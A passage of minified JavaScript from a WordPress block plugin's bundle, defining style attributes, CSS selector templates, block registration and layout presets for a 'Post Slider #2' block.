"},{depends:[{key:"titleStyle",condition:"==",value:"style9"}],selector:"{{ULTP}} .ultp-title-style9 a { background-image: linear-gradient(120deg,{{titleAnimColor}} 0%, {{titleAnimColor}} 100%); background-repeat: no-repeat; background-size: 100% 10px; background-position: 0 88%; transition: 0.3s ease-in; padding: 3px 5px; }"}]},imageShow:{type:"boolean",default:!0},imgCrop:{type:"string",default:"full"},imgOverlay:{type:"boolean",default:!1},imgBgbrightness:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-block-image { filter: brightness({{imgBgbrightness}}); }"}]},imgBgBlur:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-block-image > a { filter: blur({{imgBgBlur}}px);}"}]},imgOverlayType:{type:"string",default:"default",style:[{depends:[{key:"imgOverlay",condition:"==",value:!0}]}]},overlayColor:{type:"object",default:{openColor:1,type:"color",color:"#0e1523"},style:[{depends:[{key:"imgOverlayType",condition:"==",value:"custom"}],selector:"{{ULTP}} .ultp-block-image-custom > a::before"}]},imgOpacity:{type:"string",default:.7,style:[{depends:[{key:"imgOverlayType",condition:"==",value:"custom"}],selector:"{{ULTP}} .ultp-block-image-custom > a::before { opacity: {{imgOpacity}}; }"}]},imgHeight:{type:"object",default:{lg:""},style:[{depends:[{key:"layout",condition:"==",value:"slide3"}],selector:"{{ULTP}} .ultp-block-slider-wrap > .ultp-block-image-inner { height:{{imgHeight}} !important; }"},{depends:[{key:"layout",condition:"==",value:"slide6"}],selector:"{{ULTP}} .ultp-block-slider-wrap > .ultp-block-image-inner { height:{{imgHeight}} !important; }"}]},imgWidth:{type:"object",default:{lg:"",unit:"%"},style:[{depends:[{key:"layout",condition:"==",value:"slide2"}],selector:"{{ULTP}} .ultp-block-slider-wrap > .ultp-block-image-inner { width:{{imgWidth}} !important; }"},{depends:[{key:"layout",condition:"==",value:"slide7"}],selector:"{{ULTP}} .ultp-block-slider-wrap > .ultp-block-image-inner { width:{{imgWidth}} !important; }"},{depends:[{key:"layout",condition:"==",value:"slide6"}],selector:"{{ULTP}} .ultp-block-slider-wrap > .ultp-block-image-inner { width:{{imgWidth}} !important; }"}]},imgGrayScale:{type:"object",default:{lg:"0",ulg:"%",unit:"%"},style:[{selector:"{{ULTP}} .ultp-block-image img { filter: grayscale({{imgGrayScale}}); }"}]},imgHoverGrayScale:{type:"object",default:{lg:"0",unit:"%"},style:[{selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-image img { filter: grayscale({{imgHoverGrayScale}}); }"}]},imgRadius:{type:"object",default:{lg:"",unit:"px"},style:[{selector:"{{ULTP}} .ultp-block-image { border-radius:{{imgRadius}}; }"}]},imgHoverRadius:{type:"object",default:{lg:"",unit:"px"},style:[{selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-image { border-radius:{{imgHoverRadius}}; }"}]},imgShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-block-image"}]},imgHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-image"}]},fallbackEnable:{type:"boolean",default:!0},fallbackImg:{type:"object",default:"",style:[{depends:[{key:"fallbackEnable",condition:"==",value:!0}]}]},imgSrcset:{type:"boolean",default:!1},imgLazy:{type:"boolean",default:!1},showSeoMeta:{type:"boolean",default:!1},showFullExcerpt:{type:"boolean",default:!1,style:[{depends:[{key:"showSeoMeta",condition:"==",value:!1}]}]},excerptLimit:{type:"string",default:40,style:[{depends:[{key:"showFullExcerpt",condition:"==",value:!1}]}]},excerptColor:{type:"string",default:"#fff8",style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt, \n        {{ULTP}} .ultp-block-excerpt p { color:{{excerptColor}}; }"}]},excerptTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:26,unit:"px"},decoration:"none",family:""},style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt, \n          {{ULTP}} .ultp-block-excerpt p"}]},excerptPadding:{type:"object",default:{lg:{top:10,bottom:"",unit:"px"}},style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt{ padding: {{excerptPadding}}; }"}]},arrowStyle:{type:"string",default:"leftAngle2#rightAngle2",style:[{depends:[{key:"arrows",condition:"==",value:!0}]}]},arrowSize:{type:"object",default:{lg:"80",unit:"px"},style:[{depends:[{key:"arrows",condition:"==",value:!0}],selector:"{{ULTP}} .slick-next svg, \n          {{ULTP}} .slick-prev svg { width:{{arrowSize}}; }"}]},arrowWidth:{type:"object",default:{lg:"60",unit:"px"},style:[{depends:[{key:"arrows",condition:"==",value:!0}],selector:"{{ULTP}} .slick-arrow { width:{{arrowWidth}}; }"}]},arrowHeight:{type:"object",default:{lg:"60",unit:"px"},style:[{depends:[{key:"arrows",condition:"==",value:!0}],selector:"{{ULTP}} .slick-arrow { height:{{arrowHeight}}; } \n          {{ULTP}} .slick-arrow { line-height:{{arrowHeight}}; }"}]},arrowSpaceBetween:{type:"boolean",default:!1,style:[{depends:[{key:"layout",condition:"==",value:"slide6"}]},{depends:[{key:"layout",condition:"==",value:"slide5"}]},{depends:[{key:"layout",condition:"==",value:"slide8"}]}]},arrowPosBetween:{type:"object",default:{lg:"45",sm:"16",xs:"0",unit:"px"},style:[{depends:[{key:"arrows",condition:"==",value:!0},{key:"layout",condition:"==",value:"slide6"},{key:"arrowSpaceBetween",condition:"==",value:!0}],selector:"{{ULTP}} .slick-next { right:{{arrowPosBetween}}; } \n          {{ULTP}} .slick-prev { left:{{arrowPosBetween}}; }"},{depends:[{key:"arrows",condition:"==",value:!0},{key:"layout",condition:"==",value:"slide5"},{key:"arrowSpaceBetween",condition:"==",value:!0}],selector:"{{ULTP}} .slick-next { right:{{arrowPosBetween}}; } \n          {{ULTP}} .slick-prev { left:{{arrowPosBetween}}; }"},{depends:[{key:"arrows",condition:"==",value:!0},{key:"layout",condition:"==",value:"slide8"},{key:"arrowSpaceBetween",condition:"==",value:!0}],selector:"{{ULTP}} .slick-next { right:{{arrowPosBetween}}; } \n          {{ULTP}} .slick-prev { left:{{arrowPosBetween}}; }"}]},arrowPos:{type:"string",default:"left",style:[{depends:[{key:"layout",condition:"==",value:"slide6"},{key:"arrows",condition:"==",value:!0},{key:"arrowSpaceBetween",condition:"==",value:!1}]},{depends:[{key:"layout",condition:"==",value:"slide5"},{key:"arrows",condition:"==",value:!0},{key:"arrowSpaceBetween",condition:"==",value:!1}]},{depends:[{key:"layout",condition:"==",value:"slide8"},{key:"arrows",condition:"==",value:!0},{key:"arrowSpaceBetween",condition:"==",value:!1}]}]},arrowVartical:{type:"object",default:{lg:"45",sm:"16",xs:"0",unit:"px"},style:[{depends:[{key:"arrowSpaceBetween",condition:"==",value:!1},{key:"arrows",condition:"==",value:!0},{key:"layout",condition:"!=",value:"slide5"},{key:"layout",condition:"!=",value:"slide8"},{key:"layout",condition:"!=",value:"slide6"}],selector:"{{ULTP}} .slick-next { right:{{arrowVartical}}; } \n          {{ULTP}} .slick-prev { left:{{arrowVartical}}; }"},{depends:[{key:"arrowSpaceBetween",condition:"==",value:!0},{key:"arrows",condition:"==",value:!0},{key:"layout",condition:"!=",value:"slide5"},{key:"layout",condition:"!=",value:"slide8"},{key:"layout",condition:"!=",value:"slide6"}],selector:"{{ULTP}} .slick-next { right:{{arrowVartical}}; } \n          {{ULTP}} .slick-prev { left:{{arrowVartical}}; }"},{depends:[{key:"arrows",condition:"==",value:!0},{key:"layout",condition:"==",value:"slide5"}],selector:"{{ULTP}} .slick-next { top:{{arrowVartical}}; } \n          {{ULTP}} .slick-prev { top:{{arrowVartical}}; }"},{depends:[{key:"arrows",condition:"==",value:!0},{key:"layout",condition:"==",value:"slide6"}],selector:"{{ULTP}} .slick-next { top:{{arrowVartical}}; } \n          {{ULTP}} .slick-prev { top:{{arrowVartical}}; }"},{depends:[{key:"arrows",condition:"==",value:!0},{key:"layout",condition:"==",value:"slide7"}],selector:"{{ULTP}} .slick-next { top:{{arrowVartical}}; } \n          {{ULTP}} .slick-prev { top:{{arrowVartical}}; }"},{depends:[{key:"arrows",condition:"==",value:!0},{key:"layout",condition:"==",value:"slide8"}],selector:"{{ULTP}} .slick-next { top:{{arrowVartical}}; } \n          {{ULTP}} .slick-prev { top:{{arrowVartical}}; }"}]},prevArrowPos:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"arrowSpaceBetween",condition:"==",value:!1},{key:"layout",condition:"==",value:"slide5"},{key:"arrowPos",condition:"==",value:"right"}],selector:"{{ULTP}} .slick-prev { left: unset !important; right: {{prevArrowPos}} !important; }"},{depends:[{key:"arrowSpaceBetween",condition:"==",value:!1},{key:"layout",condition:"==",value:"slide6"},{key:"arrowPos",condition:"==",value:"right"}],selector:"{{ULTP}} .slick-prev { left: unset !important; right: {{prevArrowPos}} !important; }"},{depends:[{key:"arrowSpaceBetween",condition:"==",value:!1},{key:"layout",condition:"==",value:"slide8"},{key:"arrowPos",condition:"==",value:"right"}],selector:"{{ULTP}} .slick-prev { left: unset !important; right: {{prevArrowPos}} !important; }"},{depends:[{key:"layout",condition:"==",value:"slide7"}],selector:"{{ULTP}} .slick-prev { right: unset !important; left: {{prevArrowPos}} !important; }"},{depends:[{key:"layout",condition:"==",value:"slide7"}],selector:"{{ULTP}} .slick-prev { right: unset !important; left: {{prevArrowPos}} !important; }"},{depends:[{key:"layout",condition:"==",value:"slide5"},{key:"arrowPos",condition:"==",value:"left"},{key:"arrowSpaceBetween",condition:"==",value:!1}],selector:"{{ULTP}} .slick-prev { right: unset !important; left: {{prevArrowPos}} !important; }"},{depends:[{key:"layout",condition:"==",value:"slide6"},{key:"arrowPos",condition:"==",value:"left"},{key:"arrowSpaceBetween",condition:"==",value:!1}],selector:"{{ULTP}} .slick-prev { right: unset !important; left: {{prevArrowPos}} !important; }"},{depends:[{key:"layout",condition:"==",value:"slide8"},{key:"arrowPos",condition:"==",value:"left"},{key:"arrowSpaceBetween",condition:"==",value:!1}],selector:"{{ULTP}} .slick-prev { right: unset !important; left: {{prevArrowPos}} !important; }"}]},nextArrowPos:{type:"object",default:{lg:"60",unit:"px"},style:[{depends:[{key:"arrowSpaceBetween",condition:"==",value:!1},{key:"layout",condition:"==",value:"slide5"},{key:"arrowPos",condition:"==",value:"right"}],selector:"{{ULTP}} .slick-next { left: unset !important; right: {{nextArrowPos}} !important; }"},{depends:[{key:"arrowSpaceBetween",condition:"==",value:!1},{key:"layout",condition:"==",value:"slide6"},{key:"arrowPos",condition:"==",value:"right"}],selector:"{{ULTP}} .slick-next { left: unset !important; right: {{nextArrowPos}} !important; }"},{depends:[{key:"arrowSpaceBetween",condition:"==",value:!1},{key:"layout",condition:"==",value:"slide8"},{key:"arrowPos",condition:"==",value:"right"}],selector:"{{ULTP}} .slick-next { left: unset !important; right: {{nextArrowPos}} !important; }"},{depends:[{key:"layout",condition:"==",value:"slide7"}],selector:"{{ULTP}} .slick-next { left: unset !important; right: {{nextArrowPos}} !important; }"},{depends:[{key:"arrowSpaceBetween",condition:"==",value:!1},{key:"layout",condition:"==",value:"slide5"},{key:"arrowPos",condition:"==",value:"left"}],selector:"{{ULTP}} .slick-next { right: unset !important; left: {{nextArrowPos}} !important; }"},{depends:[{key:"arrowSpaceBetween",condition:"==",value:!1},{key:"layout",condition:"==",value:"slide6"},{key:"arrowPos",condition:"==",value:"left"}],selector:"{{ULTP}} .slick-next { right: unset !important; left: {{nextArrowPos}} !important; }"},{depends:[{key:"arrowSpaceBetween",condition:"==",value:!1},{key:"layout",condition:"==",value:"slide8"},{key:"arrowPos",condition:"==",value:"left"}],selector:"{{ULTP}} .slick-next { right: unset !important; left: {{nextArrowPos}} !important; }"}]},arrowColor:{type:"string",default:"#000",style:[{depends:[{key:"arrows",condition:"==",value:!0}],selector:"{{ULTP}} .slick-arrow:before { color:{{arrowColor}}; }\n          {{ULTP}} .slick-arrow svg { color:{{arrowColor}}; }"}]},arrowHoverColor:{type:"string",default:"#000",style:[{depends:[{key:"arrows",condition:"==",value:!0}],selector:"{{ULTP}} .slick-arrow:hover:before { color:{{arrowHoverColor}}; } \n          {{ULTP}} .slick-arrow:hover svg { color:{{arrowHoverColor}}; }"}]},arrowBg:{type:"string",default:"",style:[{depends:[{key:"arrows",condition:"==",value:!0}],selector:"{{ULTP}} .slick-arrow { background:{{arrowBg}}; }"}]},arrowHoverBg:{type:"string",default:"",style:[{depends:[{key:"arrows",condition:"==",value:!0}],selector:"{{ULTP}} .slick-arrow:hover { background:{{arrowHoverBg}}; }"}]},arrowBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"arrows",condition:"==",value:!0}],selector:"{{ULTP}} .slick-arrow"}]},arrowHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"arrows",condition:"==",value:!0}],selector:"{{ULTP}} .slick-arrow:hover"}]},arrowRadius:{type:"object",default:{lg:{top:"0",bottom:"50",left:"50",right:"50",unit:"px"}},style:[{depends:[{key:"arrows",condition:"==",value:!0}],selector:"{{ULTP}} .slick-arrow { border-radius: {{arrowRadius}}; }"}]},arrowHoverRadius:{type:"object",default:{lg:{top:"50",bottom:"50",left:"50",right:"50",unit:"px"}},style:[{depends:[{key:"arrows",condition:"==",value:!0}],selector:"{{ULTP}} .slick-arrow:hover{ border-radius: {{arrowHoverRadius}}; }"}]},arrowShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"arrows",condition:"==",value:!0}],selector:"{{ULTP}} .slick-arrow"}]},arrowHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"arrows",condition:"==",value:!0}],selector:"{{ULTP}} .slick-arrow:hover"}]},dotWidth:{type:"object",default:{lg:"5",unit:"px"},style:[{depends:[{key:"dots",condition:"==",value:!0}],selector:"{{ULTP}} .slick-dots li button { width:{{dotWidth}}; }"}]},dotHeight:{type:"object",default:{lg:"5",unit:"px"},style:[{depends:[{key:"dots",condition:"==",value:!0}],selector:"{{ULTP}} .slick-dots li button { height:{{dotHeight}}; }"}]},dotHoverWidth:{type:"object",default:{lg:"8",unit:"px"},style:[{depends:[{key:"dots",condition:"==",value:!0}],selector:"{{ULTP}} .slick-dots li.slick-active button { width:{{dotHoverWidth}}; }"}]},dotHoverHeight:{type:"object",default:{lg:"8",unit:"px"},style:[{depends:[{key:"dots",condition:"==",value:!0}],selector:"{{ULTP}} .slick-dots li.slick-active button { height:{{dotHoverHeight}}; }"}]},dotSpace:{type:"object",default:{lg:"4",unit:"px"},style:[{depends:[{key:"dots",condition:"==",value:!0}],selector:"{{ULTP}} .slick-dots { padding: 0 {{dotSpace}}; } \n          {{ULTP}} .slick-dots li button { margin: 0 {{dotSpace}}; }"}]},dotVartical:{type:"object",default:{lg:"-20",unit:"px"},style:[{depends:[{key:"dots",condition:"==",value:!0}],selector:"{{ULTP}} .slick-dots { bottom:{{dotVartical}}; }"}]},dotHorizontal:{type:"object",default:{lg:""},style:[{depends:[{key:"dots",condition:"==",value:!0}],selector:"{{ULTP}} .slick-dots { left:{{dotHorizontal}}; }"}]},dotBg:{type:"string",default:"#9b9b9b",style:[{depends:[{key:"dots",condition:"==",value:!0}],selector:"{{ULTP}} .slick-dots li button { background:{{dotBg}}; }"}]},dotHoverBg:{type:"string",default:"#9b9b9b",style:[{depends:[{key:"dots",condition:"==",value:!0}],selector:"{{ULTP}} .slick-dots li button:hover, \n          {{ULTP}} .slick-dots li.slick-active button { background:{{dotHoverBg}}; }"}]},dotBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"dots",condition:"==",value:!0}],selector:"{{ULTP}} .slick-dots li button"}]},dotHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"dots",condition:"==",value:!0}],selector:"{{ULTP}} .slick-dots li button:hover, \n          {{ULTP}} .slick-dots li.slick-active button"}]},dotRadius:{type:"object",default:{lg:{top:"50",bottom:"50",left:"50",right:"50",unit:"px"}},style:[{depends:[{key:"dots",condition:"==",value:!0}],selector:"{{ULTP}} .slick-dots li button { border-radius: {{dotRadius}}; }"}]},dotHoverRadius:{type:"object",default:{lg:{top:"50",bottom:"50",left:"50",right:"50",unit:"px"}},style:[{depends:[{key:"dots",condition:"==",value:!0}],selector:"{{ULTP}} .slick-dots li button:hover, \n          {{ULTP}} .slick-dots li.slick-active button { border-radius: {{dotHoverRadius}}; }"}]},dotShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"dots",condition:"==",value:!0}],selector:"{{ULTP}} .slick-dots li button"}]},dotHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"dots",condition:"==",value:!0}],selector:"{{ULTP}} .slick-dots li button:hover, \n          {{ULTP}} .slick-dots li.slick-active button"}]},contentVerticalPosition:{type:"string",default:"bottomPosition",style:[{depends:[{key:"contentVerticalPosition",condition:"==",value:"topPosition"},{key:"layout",condition:"!=",value:"slide3"}],selector:"{{ULTP}} .ultp-block-content-topPosition { align-items:flex-start; }"},{depends:[{key:"contentVerticalPosition",condition:"==",value:"middlePosition"},{key:"layout",condition:"!=",value:"slide3"}],selector:"{{ULTP}} .ultp-block-content-middlePosition { align-items:center; }"},{depends:[{key:"contentVerticalPosition",condition:"==",value:"bottomPosition"},{key:"layout",condition:"!=",value:"slide3"}],selector:"{{ULTP}} .ultp-block-content-bottomPosition { align-items:flex-end; }"}]},contentHorizontalPosition:{type:"string",default:"centerPosition",style:[{depends:[{key:"contentHorizontalPosition",condition:"==",value:"leftPosition"},{key:"layout",condition:"!=",value:"slide2"},{key:"layout",condition:"!=",value:"slide3"}],selector:"{{ULTP}} .ultp-block-content-leftPosition { justify-content:flex-start; }"},{depends:[{key:"contentHorizontalPosition",condition:"==",value:"centerPosition"},{key:"layout",condition:"!=",value:"slide2"},{key:"layout",condition:"!=",value:"slide3"}],selector:"{{ULTP}} .ultp-block-content-centerPosition { justify-content:center; }"},{depends:[{key:"contentHorizontalPosition",condition:"==",value:"rightPosition"},{key:"layout",condition:"!=",value:"slide2"},{key:"layout",condition:"!=",value:"slide3"}],selector:"{{ULTP}} .ultp-block-content-rightPosition { justify-content:flex-end; }"}]},contentAlign:{type:"string",default:"center",style:[{depends:[{key:"contentAlign",condition:"==",value:"left"}],selector:"{{ULTP}} .ultp-block-content-inner { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta {justify-content: flex-start;}"},{depends:[{key:"contentAlign",condition:"==",value:"center"}],selector:"{{ULTP}} .ultp-block-content-inner { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta {justify-content: center;}"},{depends:[{key:"contentAlign",condition:"==",value:"right"}],selector:"{{ULTP}} .ultp-block-content-inner { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta {justify-content: flex-end;}"}]},contenWraptWidth:{type:"object",default:{lg:"100",unit:"%"},style:[{depends:[{key:"layout",condition:"==",value:"slide2"}],selector:"{{ULTP}} .ultp-block-slider-wrap > .ultp-block-content { width:{{contenWraptWidth}}; }"},{depends:[{key:"layout",condition:"!=",value:"slide2"}],depends:[{key:"layout",condition:"!=",value:"slide3"}],selector:"{{ULTP}} .ultp-block-content .ultp-block-content-inner { width:{{contenWraptWidth}}; }"}]},contenWraptHeight:{type:"object",default:{lg:""},style:[{depends:[{key:"layout",condition:"==",value:"slide2"}],selector:"{{ULTP}} .ultp-block-slider-wrap > .ultp-block-content { height:{{contenWraptHeight}}; }"},{depends:[{key:"layout",condition:"==",value:"slide3"}],selector:"{{ULTP}} .ultp-block-slider-wrap > .ultp-block-content { height:{{contenWraptHeight}} !important; }"},{depends:[{key:"layout",condition:"!=",value:"slide2"},{key:"layout",condition:"!=",value:"slide3"}],selector:"{{ULTP}} .ultp-block-content-inner { height:{{contenWraptHeight}} !important; }"}]},slideBgBlur:{type:"string",default:"",style:[{depends:[{key:"layout",condition:"!=",value:"slide2"},{key:"layout",condition:"!=",value:"slide3"},{key:"layout",condition:"!=",value:"slide6"}],selector:"{{ULTP}} .ultp-block-content-inner { backdrop-filter: blur({{slideBgBlur}}px); }"}]},contentWrapBg:{type:"string",default:"#00000069",style:[{depends:[{key:"layout",condition:"==",value:"slide2"}],selector:"{{ULTP}} .ultp-slide-slide2 .ultp-block-content { background:{{contentWrapBg}}; }"},{depends:[{key:"layout",condition:"==",value:"slide3"}],selector:"{{ULTP}} .ultp-slide-slide3 .ultp-block-content { background:{{contentWrapBg}}; }"},{depends:[{key:"layout",condition:"!=",value:"slide2"},{key:"layout",condition:"!=",value:"slide3"}],selector:"{{ULTP}} .ultp-block-content-inner { background:{{contentWrapBg}}; }"}]},contentWrapHoverBg:{type:"string",default:"#00000069",style:[{depends:[{key:"layout",condition:"==",value:"slide2"}],selector:"{{ULTP}} .ultp-slide-slide2 .ultp-block-content:hover { background:{{contentWrapHoverBg}}; }"},{depends:[{key:"layout",condition:"==",value:"slide3"}],selector:"{{ULTP}} .ultp-slide-slide3 .ultp-block-content:hover { background:{{contentWrapHoverBg}}; }"},{depends:[{key:"layout",condition:"!=",value:"slide2"},{key:"layout",condition:"!=",value:"slide3"}],selector:"{{ULTP}} .ultp-block-content-inner:hover { background:{{contentWrapHoverBg}}; }"}]},contentWrapBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"layout",condition:"==",value:"slide2"}],selector:"{{ULTP}} .ultp-slide-slide2 .ultp-block-content"},{depends:[{key:"layout",condition:"==",value:"slide3"}],selector:"{{ULTP}} .ultp-slide-slide3 .ultp-block-content"},{depends:[{key:"layout",condition:"!=",value:"slide2"},{key:"layout",condition:"!=",value:"slide3"}],selector:"{{ULTP}} .ultp-block-content-inner"}]},contentWrapHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"layout",condition:"==",value:"slide2"}],selector:"{{ULTP}} .ultp-slide-slide2 .ultp-block-content:hover"},{depends:[{key:"layout",condition:"==",value:"slide3"}],selector:"{{ULTP}} .ultp-slide-slide3 .ultp-block-content:hover"},{depends:[{key:"layout",condition:"!=",value:"slide2"},{key:"layout",condition:"!=",value:"slide3"}],selector:"{{ULTP}} .ultp-block-content-inner:hover"}]},contentWrapRadius:{type:"object",default:{lg:{top:"6",bottom:"6",left:"6",right:"6",unit:"px"}},style:[{depends:[{key:"layout",condition:"==",value:"slide2"}],selector:"{{ULTP}} .ultp-slide-slide2 .ultp-block-content { border-radius:{{contentWrapRadius}}; }"},{depends:[{key:"layout",condition:"==",value:"slide3"}],selector:"{{ULTP}} .ultp-slide-slide3 .ultp-block-content { border-radius:{{contentWrapRadius}}; }"},{depends:[{key:"layout",condition:"!=",value:"slide2"},{key:"layout",condition:"!=",value:"slide3"}],selector:"{{ULTP}} .ultp-block-content-inner { border-radius: {{contentWrapRadius}}; }"}]},contentWrapHoverRadius:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{depends:[{key:"layout",condition:"==",value:"slide2"}],selector:"{{ULTP}} .ultp-slide-slide2 .ultp-block-content:hover { border-radius: {{contentWrapHoverRadius}}; }"},{depends:[{key:"layout",condition:"==",value:"slide3"}],selector:"{{ULTP}} .ultp-slide-slide3 .ultp-block-content:hover { border-radius: {{contentWrapHoverRadius}}; }"},{depends:[{key:"layout",condition:"!=",value:"slide2"},{key:"layout",condition:"!=",value:"slide3"}],selector:"{{ULTP}} .ultp-block-content-inner:hover { border-radius: {{contentWrapHoverRadius}}; }"}]},contentWrapShadow:{type:"object",default:{openShadow:0,width:{top:0,right:5,bottom:15,left:0},color:"rgba(0,0,0,0.15)"},style:[{depends:[{key:"layout",condition:"==",value:"slide2"}],selector:"{{ULTP}} .ultp-slide-slide2 .ultp-block-content"},{depends:[{key:"layout",condition:"==",value:"slide3"}],selector:"{{ULTP}} .ultp-slide-slide3 .ultp-block-content"},{depends:[{key:"layout",condition:"!=",value:"slide2"},{key:"layout",condition:"!=",value:"slide3"}],selector:"{{ULTP}} .ultp-block-content-inner"}]},contentWrapHoverShadow:{type:"object",default:{openShadow:0,width:{top:0,right:10,bottom:25,left:0},color:"rgba(0,0,0,0.25)"},style:[{depends:[{key:"layout",condition:"==",value:"slide2"}],selector:"{{ULTP}} .ultp-slide-slide2 .ultp-block-content"},{depends:[{key:"layout",condition:"==",value:"slide3"}],selector:"{{ULTP}} .ultp-slide-slide3 .ultp-block-content"},{depends:[{key:"layout",condition:"!=",value:"slide2"},{key:"layout",condition:"!=",value:"slide3"}],selector:"{{ULTP}} .ultp-block-content-inner:hover"}]},contentWrapPadding:{type:"object",default:{lg:{top:"27",bottom:"27",left:"",right:"",unit:"px"}},style:[{depends:[{key:"layout",condition:"==",value:"slide2"}],selector:"{{ULTP}} .ultp-slide-slide2 .ultp-block-content { padding: {{contentWrapPadding}}; }"},{depends:[{key:"layout",condition:"==",value:"slide3"}],selector:"{{ULTP}} .ultp-slide-slide3 .ultp-block-content { padding: {{contentWrapPadding}}; }"},{depends:[{key:"layout",condition:"!=",value:"slide2"},{key:"layout",condition:"!=",value:"slide3"}],selector:"{{ULTP}} .ultp-block-content-inner { padding: {{contentWrapPadding}}; }"}]},slideWrapMargin:{type:"object",default:{lg:{top:"50",bottom:"50",left:"50",right:"50",unit:"px"}},style:[{depends:[{key:"layout",condition:"==",value:"slide6"}],selector:"{{ULTP}} .ultp-block-content { margin: {{slideWrapMargin}}; }"},{depends:[{key:"layout",condition:"==",value:"slide7"}],selector:"{{ULTP}} .ultp-block-content { margin: {{slideWrapMargin}}; }"},{depends:[{key:"layout",condition:"==",value:"slide8"}],selector:"{{ULTP}} .ultp-block-content { margin: {{slideWrapMargin}}; }"}]},headingText:{type:"string",default:"Post Slider #2"},...(0,o.t)(["advanceAttr","heading","meta","category","readMore","query"],[],[{key:"queryNumPosts",default:{lg:5}},{key:"queryNumber",default:5},{key:"loadingColor",style:[{selector:"{{ULTP}} .ultp-loading .ultp-loading-blocks div , \n          {{ULTP}} .ultp-loading .ultp-loading-spinner div { --loading-block-color: {{loadingColor}}; }"}]},{key:"metaStyle",default:"noIcon"},{key:"metaList",default:'["metaAuthor","metaDate"]'},{key:"metaColor",default:"#F3F3F3"},{key:"metaSeparatorColor",default:"#b3b3b3"},{key:"metaSpacing",default:{lg:"10",unit:"px"}},{key:"catTypo",default:{openTypography:1,size:{lg:12,unit:"px"},height:{lg:18,unit:"px"},spacing:{lg:7.32002,unit:"px"},transform:"uppercase",weight:"300",decoration:"none",family:""}},{key:"catSacing",default:{lg:{top:0,bottom:0,unit:"px"}}},{key:"readMoreColor",default:"var(--postx_preset_Primary_color)"},{key:"catBgHoverColor",default:{openColor:0,type:"color",color:"#b3b3b3"}},{key:"readMoreBgColor",default:{openColor:0,type:"color",color:"#037fff"}},{key:"readMoreHoverColor",default:"var(--postx_preset_Secondary_color)"},{key:"readMoreBgHoverColor",default:{openColor:0,type:"color",color:"#0c32d8"}},{key:"readMoreSacing",default:{lg:{top:30,bottom:"",left:"",right:"",unit:"px"}}},{key:"readMorePadding",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}}}]),V4_1_0_CompCheck:a.O,...(0,i.b)()}},32633:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(73504),n=l(22105),r=l(1106);const{__}=wp.i18n,{registerBlockType:s}=wp.blocks;(0,a.Z)("https://wpxpo.com/docs/postx/all-blocks/post-slider-2/","block_docs"),s(r,{icon:(0,o.createElement)("div",{className:"ultp-block-inserter-icon-section"},(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/post-slider-2.svg"}),!ultp_data.active&&(0,o.createElement)("span",{className:"ultp-pro-block"},"Pro")),attributes:n.Z,example:{attributes:{previewImg:ultp_data.url+"assets/img/preview/post-slider2.svg"}},edit:i.Z,save:()=>null})},50814:(e,t,l)=>{"use strict";l.d(t,{P:()=>o});const o={slide1:{autoPlay:!0,excerptShow:!1,readMore:!1,imgOverlay:!1,sliderGap:0,height:{lg:550,unit:"px"},slidesCenterPadding:{lg:"160",sm:"100",xs:"50"},imgBgBlur:"0",contentWrapBg:"#00000069",contentWrapHoverBg:"#00000069",slideBgBlur:"",contentAlign:"center",contentVerticalPosition:"bottomPosition",contenWraptHeight:{lg:"",ulg:""},contentWrapRadius:{lg:"10"},contentWrapHoverRadius:{lg:"10"},contentWrapPadding:{lg:{top:"27",bottom:"27",left:"24",right:"24",unit:"px"},sm:{top:"27",bottom:"27",left:"16",right:"16",unit:"px"}},titleColor:"#fff",titleHoverColor:"rgba(107,107,107,1)",titleTypo:{decoration:"none",family:"",height:{lg:"36",unit:"px"},openTypography:1,size:{lg:"24",unit:"px"},weight:"300",transform:"uppercase"},metaColor:"#FFFFFFA8",metaHoverColor:"#a5a5a5",metaTypo:{decoration:"none",family:"",height:{lg:"20",unit:"px"},openTypography:1,size:{lg:"12",unit:"px"},weight:"300"},metaStyle:"noIcon",metaList:'["metaAuthor","metaDate"]',meta